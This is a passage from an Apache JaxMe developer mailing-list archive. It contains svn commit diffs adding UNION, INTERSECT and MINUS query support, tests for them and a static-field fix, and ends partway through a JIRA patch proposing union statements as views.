http://svn.apache.org/viewvc/webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/IntersectionStatement.java?rev=567590&view=auto ============================================================================== --- webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/IntersectionStatement.java (added) +++ webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/IntersectionStatement.java Mon Aug 20 01:21:49 2007 @@ -0,0 +1,5 @@ +package org.apache.ws.jaxme.sqls; + +public interface IntersectionStatement extends SelectCombinationStatement { + +} Added: webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/MinusStatement.java URL: http://svn.apache.org/viewvc/webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/MinusStatement.java?rev=567590&view=auto ============================================================================== --- webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/MinusStatement.java (added) +++ webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/MinusStatement.java Mon Aug 20 01:21:49 2007 @@ -0,0 +1,9 @@ +package org.apache.ws.jaxme.sqls; + + +/** + * Interface of a "select ... MINUS select ..." statement. + */ +public interface MinusStatement extends SelectCombinationStatement { + +} Modified: webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/SQLFactory.java URL: http://svn.apache.org/viewvc/webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/SQLFactory.java?rev=567590&r1=567589&r2=567590&view=diff ============================================================================== --- webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/SQLFactory.java (original) +++ webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/SQLFactory.java Mon Aug 20 01:21:49 2007 @@ -89,6 +89,21 @@ */ public DeleteStatement newDeleteStatement(); + /** + * <p>Creates a new UNION statement.</p> + */ + public UnionStatement newUnionStatement(); + + /** + * <p>Creates a new INTERSECTION statement.</p> + */ + public IntersectionStatement newIntersectionStatement(); + + /** + * <p>Creates a new MINUS statement.</p> + */ + public MinusStatement newMinusStatement(); + /** <p>Creates a new {@link Schema} with the given name.</p> */ public Schema newSchema(String pName); Added: webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/SelectCombinationStatement.java URL: http://svn.apache.org/viewvc/webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/SelectCombinationStatement.java?rev=567590&view=auto ============================================================================== --- webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/SelectCombinationStatement.java (added) +++ webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/SelectCombinationStatement.java Mon Aug 20 01:21:49 2007 @@ -0,0 +1,21 @@ +package org.apache.ws.jaxme.sqls; + +import java.util.Iterator; + + +/** + * Common base interface for {@link UnionStatement}, and + * {@link IntersectionStatement}. + */ +public interface SelectCombinationStatement extends Statement { + /** + * Adds a select statement to the given "union", or + * "intersection" statement. + */ + void addStatement(SelectStatement pStatement); + + /** + * Returns an iterator over all the select statements. + */ + Iterator getSelectStatements(); +} Added: webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/UnionStatement.java URL: http://svn.apache.org/viewvc/webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/UnionStatement.java?rev=567590&view=auto ============================================================================== --- webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/UnionStatement.java (added) +++ webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/UnionStatement.java Mon Aug 20 01:21:49 2007 @@ -0,0 +1,19 @@ +package org.apache.ws.jaxme.sqls; + + +/** + * Interface of a "select .... union select ..." statement. + */ +public interface UnionStatement extends SelectCombinationStatement { + /** + * Sets, whether this is a "union all" statement. By default, + * it isn't. + */ + void setAll(boolean pAll); + + /** + * Returns, whether this is a "union all" statement. By default, + * it isn't. + */ + boolean isAll(); +} Modified: webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/ColumnImpl.java URL: http://svn.apache.org/viewvc/webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/ColumnImpl.java?rev=567590&r1=567589&r2=567590&view=diff ============================================================================== --- webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/ColumnImpl.java (original) +++ webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/ColumnImpl.java Mon Aug 20 01:21:49 2007 @@ -36,16 +36,30 @@ return o != null && (o instanceof Column.Name) && super.equals(o); } } - public static class TypeImpl extends SQLFactoryImpl.IdentImpl implements Column.Type { - private int jdbcType; - public TypeImpl(String pName, int pJDBCType) { - super(pName); - jdbcType = pJDBCType; + + public static class TypeImpl extends SQLFactoryImpl.IdentImpl implements Column.Type { + private int jdbcType; + public TypeImpl(String pName, int pJDBCType) { + super(pName); + jdbcType = pJDBCType; + } + public int getJDBCType() { + return jdbcType; + } + public int hashCode() { + return 31 * jdbcType; + } + public boolean equals(Object obj) { + if (this == obj) + return true; + if (!super.equals(obj)) + return false; + if (getClass() != obj.getClass()) + return false; + final TypeImpl other = (TypeImpl) obj; + return jdbcType == other.jdbcType; + } } - public int getJDBCType() { - return jdbcType; - } - } private Table table; Added: webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/IntersectionStatementImpl.java URL: http://svn.apache.org/viewvc/webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/IntersectionStatementImpl.java?rev=567590&view=auto ============================================================================== --- webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/IntersectionStatementImpl.java (added) +++ webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/IntersectionStatementImpl.java Mon Aug 20 01:21:49 2007 @@ -0,0 +1,15 @@ +package org.apache.ws.jaxme.sqls.impl; + +import org.apache.ws.jaxme.sqls.IntersectionStatement; +import org.apache.ws.jaxme.sqls.SQLFactory; + + +/** + * Default implementation of {@link IntersectionStatement}. + */ +public class IntersectionStatementImpl extends SelectCombinationStatementImpl + implements IntersectionStatement { + protected IntersectionStatementImpl(SQLFactory pFactory) { + super(pFactory); + } +} Added: webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/MinusStatementImpl.java URL: http://svn.apache.org/viewvc/webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/MinusStatementImpl.java?rev=567590&view=auto ============================================================================== --- webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/MinusStatementImpl.java (added) +++ webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/MinusStatementImpl.java Mon Aug 20 01:21:49 2007 @@ -0,0 +1,31 @@ +package org.apache.ws.jaxme.sqls.impl; + +import java.util.Iterator; + +import org.apache.ws.jaxme.sqls.MinusStatement; +import org.apache.ws.jaxme.sqls.SQLFactory; +import org.apache.ws.jaxme.sqls.SelectStatement; + + + +/** + * Default implementation of {@link MinusStatement}. + */ +public class MinusStatementImpl extends SelectCombinationStatementImpl + implements MinusStatement { + protected MinusStatementImpl(SQLFactory pFactory) { + super(pFactory); + } + + public void addStatement(SelectStatement pStatement) { + super.addStatement(pStatement); + Iterator iter = getSelectStatements(); + iter.next(); + if (iter.hasNext()) { + iter.next(); + if (iter.hasNext()) { + throw new IllegalArgumentException("A MINUS statement must not have more than two SELECT statements."); + } + } + } +} Modified: webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/SQLFactoryImpl.java URL: http://svn.apache.org/viewvc/webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/SQLFactoryImpl.java?rev=567590&r1=567589&r2=567590&view=diff ============================================================================== --- webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/SQLFactoryImpl.java (original) +++ webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/SQLFactoryImpl.java Mon Aug 20 01:21:49 2007 @@ -34,6 +34,8 @@ import org.apache.ws.jaxme.sqls.ForeignKey; import org.apache.ws.jaxme.sqls.Index; import org.apache.ws.jaxme.sqls.InsertStatement; +import org.apache.ws.jaxme.sqls.IntersectionStatement; +import org.apache.ws.jaxme.sqls.MinusStatement; import org.apache.ws.jaxme.sqls.ObjectFactory; import org.apache.ws.jaxme.sqls.SQLFactory; import org.apache.ws.jaxme.sqls.SQLGenerator; @@ -41,6 +43,7 @@ import org.apache.ws.jaxme.sqls.SelectStatement; import org.apache.ws.jaxme.sqls.StringColumn; import org.apache.ws.jaxme.sqls.Table; +import org.apache.ws.jaxme.sqls.UnionStatement; import org.apache.ws.jaxme.sqls.UpdateStatement; @@ -608,4 +611,16 @@ public Table getTable(Connection pConnection, String pSchema, String pTable) throws SQLException { return getTable(pConnection, pSchema == null ? null : new SchemaImpl.NameImpl(pSchema), new TableImpl.NameImpl(pTable)); } + + public IntersectionStatement newIntersectionStatement() { + return new IntersectionStatementImpl(this); + } + + public UnionStatement newUnionStatement() { + return new UnionStatementImpl(this); + } + + public MinusStatement newMinusStatement() { + return new MinusStatementImpl(this); + } } Modified: webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/SQLGeneratorImpl.java URL: http://svn.apache.org/viewvc/webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/SQLGeneratorImpl.java?rev=567590&r1=567589&r2=567590&view=diff ============================================================================== --- webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/SQLGeneratorImpl.java (original) +++ webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/SQLGeneratorImpl.java Mon Aug 20 01:21:49 2007 @@ -34,11 +34,14 @@ import org.apache.ws.jaxme.sqls.ForeignKey; import org.apache.ws.jaxme.sqls.Function; import org.apache.ws.jaxme.sqls.Index; +import org.apache.ws.jaxme.sqls.IntersectionStatement; +import org.apache.ws.jaxme.sqls.MinusStatement; import org.apache.ws.jaxme.sqls.RawSQLCode; import org.apache.ws.jaxme.sqls.SQLGenerator; import org.apache.ws.jaxme.sqls.InsertStatement; import org.apache.ws.jaxme.sqls.JoinReference; import org.apache.ws.jaxme.sqls.Schema; +import org.apache.ws.jaxme.sqls.SelectCombinationStatement; import org.apache.ws.jaxme.sqls.SelectStatement; import org.apache.ws.jaxme.sqls.SelectTableReference; import org.apache.ws.jaxme.sqls.SetStatement; @@ -46,6 +49,7 @@ import org.apache.ws.jaxme.sqls.StringColumn; import org.apache.ws.jaxme.sqls.Table; import org.apache.ws.jaxme.sqls.TableReference; +import org.apache.ws.jaxme.sqls.UnionStatement; import org.apache.ws.jaxme.sqls.UpdateStatement; import org.apache.ws.jaxme.sqls.Value; @@ -979,9 +983,66 @@ } return sb.toString(); } - + + protected void checkSameStructure(SelectStatement pSt1, SelectStatement pSt2) { + final Iterator it1 = pSt1.getResultColumns(); + final Iterator it2 = pSt2.getResultColumns(); + while (it1.hasNext()) { + if (!it2.hasNext()) { + throw new IllegalArgumentException("The SELECT statements in the UNION, INTERSECT, or MINUS statements have different number of columns."); + } + final ColumnReference cr1 = (ColumnReference) it1.next(); + final ColumnReference cr2 = (ColumnReference) it2.next(); + final Column c1 = cr1.getColumn(); + final Column c2 = cr2.getColumn(); + final Column.Name n1 = cr1.getAlias() == null ? c1.getName() : cr1.getAlias(); + final Column.Name n2 = cr2.getAlias() == null ? c2.getName() : cr2.getAlias(); + if (!n1.getName().equals(n2.getName())) { + throw new IllegalArgumentException("The SELECT statements in the UNION, INTERSECT, or MINUS statements have varying names: " + + n1.getName() + " vs. " + n2.getName()); + } + if (!c1.getType().equals(c2.getType())) { + throw new IllegalArgumentException("The SELECT statements in the UNION, INTERSECT, or MINUS statements have varying types: " + + c1.getType().getName() + " vs. " + c2.getType().getName()); + } + } + if (it2.hasNext()) { + throw new IllegalArgumentException("The SELECT statements in the UNION, INTERSECT, or MINUS statements have different number of columns."); + } + } + + protected String getSelectCombinationStatement(SelectCombinationStatement pStatement, String pSep) { + final Iterator iter = pStatement.getSelectStatements(); + if (!iter.hasNext()) { + throw new IllegalArgumentException("A UNION, INTERSECT, or MINUS statement requires at least on SELECT statement."); + } + final SelectStatement first = (SelectStatement) iter.next(); + final String s = getQuery(first); + if (!iter.hasNext()) { + return s; + } + StringBuffer sb = new StringBuffer(); + sb.append('('); + sb.append(s); + sb.append(')'); + int i = 0; + while (iter.hasNext()) { + if (++i > 2 && pStatement instanceof MinusStatement) { + throw new IllegalArgumentException("A MINUS statement must not have more that two SELECT statements."); + } + SelectStatement other = (SelectStatement) iter.next(); + checkSameStructure(first, other); + sb.append(' '); + sb.append(pSep); + sb.append(" ("); + sb.append(getQuery(other)); + sb.append(')'); + } + return sb.toString(); + } + public String getQuery(Statement pStatement) { - String s; + final String s; if (pStatement instanceof InsertStatement) { s = getInsertQuery((InsertStatement) pStatement); } else if (pStatement instanceof UpdateStatement) { @@ -990,8 +1051,16 @@ s = getDeleteQuery((DeleteStatement) pStatement); } else if (pStatement instanceof SelectStatement) { s = getSelectQuery((SelectStatement) pStatement); + } else if (pStatement instanceof UnionStatement) { + final UnionStatement us = (UnionStatement) pStatement; + final boolean all = us.isAll(); + s = getSelectCombinationStatement(us, all ? "UNION ALL" : "UNION"); + } else if (pStatement instanceof IntersectionStatement) { + s = getSelectCombinationStatement((IntersectionStatement) pStatement, "INTERSECT"); + } else if (pStatement instanceof MinusStatement) { + s = getSelectCombinationStatement((MinusStatement) pStatement, "MINUS"); } else { - throw new IllegalArgumentException("The Statement is neither an INSERT, UPDATE, DELETE nor a SELECT statement."); + throw new IllegalArgumentException("The Statement is neither an INSERT, UPDATE, DELETE, SELECT, UNION, INTERSECT, nor MINUS statement."); } return newStatement(s); } Added: webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/SelectCombinationStatementImpl.java URL: http://svn.apache.org/viewvc/webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/SelectCombinationStatementImpl.java?rev=567590&view=auto ============================================================================== --- webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/SelectCombinationStatementImpl.java (added) +++ webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/SelectCombinationStatementImpl.java Mon Aug 20 01:21:49 2007 @@ -0,0 +1,29 @@ +package org.apache.ws.jaxme.sqls.impl; + +import java.util.ArrayList; +import java.util.Iterator; +import java.util.List; + +import org.apache.ws.jaxme.sqls.SQLFactory; +import org.apache.ws.jaxme.sqls.SelectCombinationStatement; +import org.apache.ws.jaxme.sqls.SelectStatement; + + +/** + * Default implementation of {@link SelectStatement}. + */ +public abstract class SelectCombinationStatementImpl extends StatementImpl implements SelectCombinationStatement { + private final List statements = new ArrayList(); + + protected SelectCombinationStatementImpl(SQLFactory pFactory) { + super(pFactory); + } + + public void addStatement(SelectStatement pStatement) { + statements.add(pStatement); + } + + public Iterator getSelectStatements() { + return statements.iterator(); + } +} Added: webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/UnionStatementImpl.java URL: http://svn.apache.org/viewvc/webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/UnionStatementImpl.java?rev=567590&view=auto ============================================================================== --- webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/UnionStatementImpl.java (added) +++ webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/impl/UnionStatementImpl.java Mon Aug 20 01:21:49 2007 @@ -0,0 +1,24 @@ +package org.apache.ws.jaxme.sqls.impl; + +import org.apache.ws.jaxme.sqls.SQLFactory; +import org.apache.ws.jaxme.sqls.UnionStatement; + + +/** + * Default implementation of {@link UnionStatement}. + */ +public class UnionStatementImpl extends SelectCombinationStatementImpl implements UnionStatement { + private boolean all; + + protected UnionStatementImpl(SQLFactory pFactory) { + super(pFactory); + } + + public boolean isAll() { + return all; + } + + public void setAll(boolean pAll) { + all = pAll; + } +} Modified: webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/junit/CreateTest.java URL: http://svn.apache.org/viewvc/webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/junit/CreateTest.java?rev=567590&r1=567589&r2=567590&view=diff ============================================================================== --- webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/junit/CreateTest.java (original) +++ webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/sqls/junit/CreateTest.java Mon Aug 20 01:21:49 2007 @@ -31,15 +31,19 @@ import org.apache.ws.jaxme.sqls.ForeignKey; import org.apache.ws.jaxme.sqls.Index; import org.apache.ws.jaxme.sqls.InsertStatement; +import org.apache.ws.jaxme.sqls.IntersectionStatement; import org.apache.ws.jaxme.sqls.JoinReference; +import org.apache.ws.jaxme.sqls.MinusStatement; import org.apache.ws.jaxme.sqls.SQLFactory; import org.apache.ws.jaxme.sqls.SQLGenerator; import org.apache.ws.jaxme.sqls.Schema; +import org.apache.ws.jaxme.sqls.SelectCombinationStatement; import org.apache.ws.jaxme.sqls.SelectStatement; import org.apache.ws.jaxme.sqls.SelectTableReference; import org.apache.ws.jaxme.sqls.StringColumn; import org.apache.ws.jaxme.sqls.Table; import org.apache.ws.jaxme.sqls.TableReference; +import org.apache.ws.jaxme.sqls.UnionStatement; import org.apache.ws.jaxme.sqls.UpdateStatement; import org.apache.ws.jaxme.sqls.impl.SQLFactoryImpl; import org.apache.ws.jaxme.sqls.impl.VirtualColumn; @@ -453,4 +457,63 @@ String expect = "SELECT MyIndex, MyName, MyDate FROM MySchema.MyTable WHERE (MyIndex+3)>5"; assertEquals(expect, got); } + + /** Test for UNION and UNION ALL. + */ + public void testUnion() { + UnionStatement us = getSQLFactory().newUnionStatement(); + createSelectCombinationStatement(us); + SQLGenerator gen = getSQLGenerator(); + String got = gen.getQuery(us); + String expect = "(SELECT MyIndex, MyName, MyDate FROM MySchema.MyTable WHERE 'MyIndex'>5) UNION (SELECT MyIndex, MyName, MyDate FROM MySchema.MyTable WHERE 'MyName' LIKE 'x%')"; + assertEquals(expect, got); + us.setAll(true); + String gotAll = gen.getQuery(us); + String expectAll = "(SELECT MyIndex, MyName, MyDate FROM MySchema.MyTable WHERE 'MyIndex'>5) UNION ALL (SELECT MyIndex, MyName, MyDate FROM MySchema.MyTable WHERE 'MyName' LIKE 'x%')"; + assertEquals(expectAll, gotAll); + } + + private void createSelectCombinationStatement(SelectCombinationStatement pStatement) { + Table t = getBasicTable(); + SelectStatement st1 = t.getSelectStatement(); + SelectStatement st2 = t.getSelectStatement(); + BooleanConstraint bc1 = st1.getWhere().createGT(); + bc1.addPart("MyIndex"); + bc1.addPart(5); + BooleanConstraint bc2 = st2.getWhere().createLIKE(); + bc2.addPart("MyName"); + bc2.addPart("x%"); + pStatement.addStatement(st1); + pStatement.addStatement(st2); + } + + /** Test for INTERSECT. + */ + public void testIntersect() { + IntersectionStatement is = getSQLFactory().newIntersectionStatement(); + createSelectCombinationStatement(is); + SQLGenerator gen = getSQLGenerator(); + String got = gen.getQuery(is); + String expect = "(SELECT MyIndex, MyName, MyDate FROM MySchema.MyTable WHERE 'MyIndex'>5) INTERSECT (SELECT MyIndex, MyName, MyDate FROM MySchema.MyTable WHERE 'MyName' LIKE 'x%')"; + assertEquals(expect, got); + } + + /** Test for MINUS. + */ + public void testMinus() { + MinusStatement ms = getSQLFactory().newMinusStatement(); + createSelectCombinationStatement(ms); + SQLGenerator gen = getSQLGenerator(); + String got = gen.getQuery(ms); + String expect = "(SELECT MyIndex, MyName, MyDate FROM MySchema.MyTable WHERE 'MyIndex'>5) MINUS (SELECT MyIndex, MyName, MyDate FROM MySchema.MyTable WHERE 'MyName' LIKE 'x%')"; + assertEquals(expect, got); + + SelectStatement st = getSQLFactory().newSelectStatement(); + try { + ms.addStatement(st); + fail("Expected exception"); + } catch (IllegalArgumentException e) { + // Ok + } + } } --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Aug 20 08:34:10 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 60181 invoked from network); 20 Aug 2007 08:34:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Aug 2007 08:34:09 -0000 Received: (qmail 82162 invoked by uid 500); 20 Aug 2007 08:34:06 -0000 Delivered-To: [email protected] Received: (qmail 82153 invoked by uid 500); 20 Aug 2007 08:34:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 82144 invoked by uid 500); 20 Aug 2007 08:34:06 -0000 Delivered-To: [email protected] Received: (qmail 82141 invoked by uid 99); 20 Aug 2007 08:34:06 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Aug 2007 01:34:06 -0700 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Aug 2007 08:34:09 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 84C0B1A9820; Mon, 20 Aug 2007 01:33:48 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r567598 - in /webservices/jaxme/branches/b0_5: src/js/org/apache/ws/jaxme/js/JavaField.java status.xml Date: Mon, 20 Aug 2007 08:33:48 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: jochen Date: Mon Aug 20 01:33:47 2007 New Revision: 567598 URL: http://svn.apache.org/viewvc?rev=567598&view=rev Log: Static fields haven't been supported in the interface. Submitted by: Adam Lewis <[email protected]> Modified: webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/js/JavaField.java webservices/jaxme/branches/b0_5/status.xml Modified: webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/js/JavaField.java URL: http://svn.apache.org/viewvc/webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/js/JavaField.java?rev=567598&r1=567597&r2=567598&view=diff ============================================================================== --- webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/js/JavaField.java (original) +++ webservices/jaxme/branches/b0_5/src/js/org/apache/ws/jaxme/js/JavaField.java Mon Aug 20 01:33:47 2007 @@ -79,7 +79,7 @@ } protected void writeNoEol(IndentationTarget pTarget) throws IOException { - if (pTarget.isInterface()) { + if (pTarget.isInterface() && !isStatic()) { return; } JavaComment jcon = getComment(); Modified: webservices/jaxme/branches/b0_5/status.xml URL: http://svn.apache.org/viewvc/webservices/jaxme/branches/b0_5/status.xml?rev=567598&r1=567597&r2=567598&view=diff ============================================================================== --- webservices/jaxme/branches/b0_5/status.xml (original) +++ webservices/jaxme/branches/b0_5/status.xml Mon Aug 20 01:33:47 2007 @@ -70,6 +70,13 @@ <action dev="JW" type="fix" context="runtime"> The DOMSerializer was mismatching localName and qName for attributes. </action> + <action dev="JW" type="fix" context="js"> + Added support for UNION, INTERSECT, and MINUS. + </action> + <action dev="JW" type="fix" context="js"> + Static java fields haven't been supported in the interface. + (Adam Lewis, [email protected]>) + </action> </release> <release version="0.5.2" date="25-Oct-2006"> <action dev="JW" type="enhancement" context="generator"> --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Aug 20 13:55:58 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16791 invoked from network); 20 Aug 2007 13:55:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Aug 2007 13:55:58 -0000 Received: (qmail 31309 invoked by uid 500); 20 Aug 2007 13:55:55 -0000 Delivered-To: [email protected] Received: (qmail 31291 invoked by uid 500); 20 Aug 2007 13:55:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 31282 invoked by uid 99); 20 Aug 2007 13:55:55 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Aug 2007 06:55:55 -0700 X-ASF-Spam-Status: No, hits=-100.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Aug 2007 13:55:51 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 9F71371420C for <[email protected]>; Mon, 20 Aug 2007 06:55:31 -0700 (PDT) Message-ID: <30884052.1187618131650.JavaMail.jira@brutus> Date: Mon, 20 Aug 2007 06:55:31 -0700 (PDT) From: =?utf-8?Q?Tobias_H=C3=BChner_=28JIRA=29?= <[email protected]> To: [email protected] Subject: [jira] Created: (JAXME-93) union statements as views MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org union statements as views ------------------------- Key: JAXME-93 URL: https://issues.apache.org/jira/browse/JAXME-93 Project: JaxMe Issue Type: Improvement Components: JaxMeJS Reporter: Tobias H=C3=BChner Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxm= e/sqls/impl/SelectCombinationStatementImpl.java =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/impl/SelectCombinationStatementImpl.java=09(revision 567598) +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/impl/SelectCombinationStatementImpl.java=09(working copy) @@ -7,6 +7,7 @@ import org.apache.ws.jaxme.sqls.SQLFactory; import org.apache.ws.jaxme.sqls.SelectCombinationStatement; import org.apache.ws.jaxme.sqls.SelectStatement; +import org.apache.ws.jaxme.sqls.Table; =20 =20 /** @@ -24,6 +25,17 @@ } =20 public Iterator getSelectStatements() { - return statements.iterator(); + if(statements.isEmpty()){ +=09=09=09throw new IllegalStateException("No Statement defined");=20 + } + =09return statements.iterator(); } + =20 +=09public Table createView(Table.Name pName) { +=09=09return getSQLFactory().getObjectFactory().newView(this,pName); +=09} + +=09public Table createView(String pName) { +=09 return createView(pName =3D=3D null ? null : new TableImpl.NameImpl= (pName)); +=09} } Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxm= e/sqls/impl/SelectCombinationViewImpl.java =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/impl/SelectCombinationViewImpl.java=09(revision 0) +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme/s= qls/impl/SelectCombinationViewImpl.java=09(revision 0) @@ -0,0 +1,126 @@ +package org.apache.ws.jaxme.sqls.impl; + + +import java.util.ArrayList; +import java.util.Iterator; +import java.util.List; + +import org.apache.ws.jaxme.sqls.Column; +import org.apache.ws.jaxme.sqls.ColumnReference; +import org.apache.ws.jaxme.sqls.DeleteStatement; +import org.apache.ws.jaxme.sqls.ForeignKey; +import org.apache.ws.jaxme.sqls.Index; +import org.apache.ws.jaxme.sqls.InsertStatement; +import org.apache.ws.jaxme.sqls.SelectCombinationStatement; +import org.apache.ws.jaxme.sqls.SelectStatement; +import org.apache.ws.jaxme.sqls.Table; +import org.apache.ws.jaxme.sqls.UpdateStatement; +import org.apache.ws.jaxme.sqls.Column.Type; + +public class SelectCombinationViewImpl extends TableImpl implements Table = { +=09private final SelectCombinationStatement statement; + +=09protected SelectCombinationViewImpl(SelectCombinationStatement pStateme= nt, Name pName) { +=09=09super((getFirstStatement(pStatement)).getTableReference().getTable()= .getSchema(), +=09=09=09=09pName =3D=3D null ? (getFirstStatement(pStatement)).getTableRe= ference().getTable().getName() : pName); +=09=09statement =3D pStatement; +=09} + +=09private static SelectStatement getFirstStatement(SelectCombinationState= ment pStatement) { +=09=09return (SelectStatement)pStatement.getSelectStatements().next(); +=09} + +=09public final SelectCombinationStatement getSelectCombinationStatement()= { +=09=09return statement; +=09} + private class ViewColumnImpl implements Column { + private final Column.Name colName; + private final Column col; + 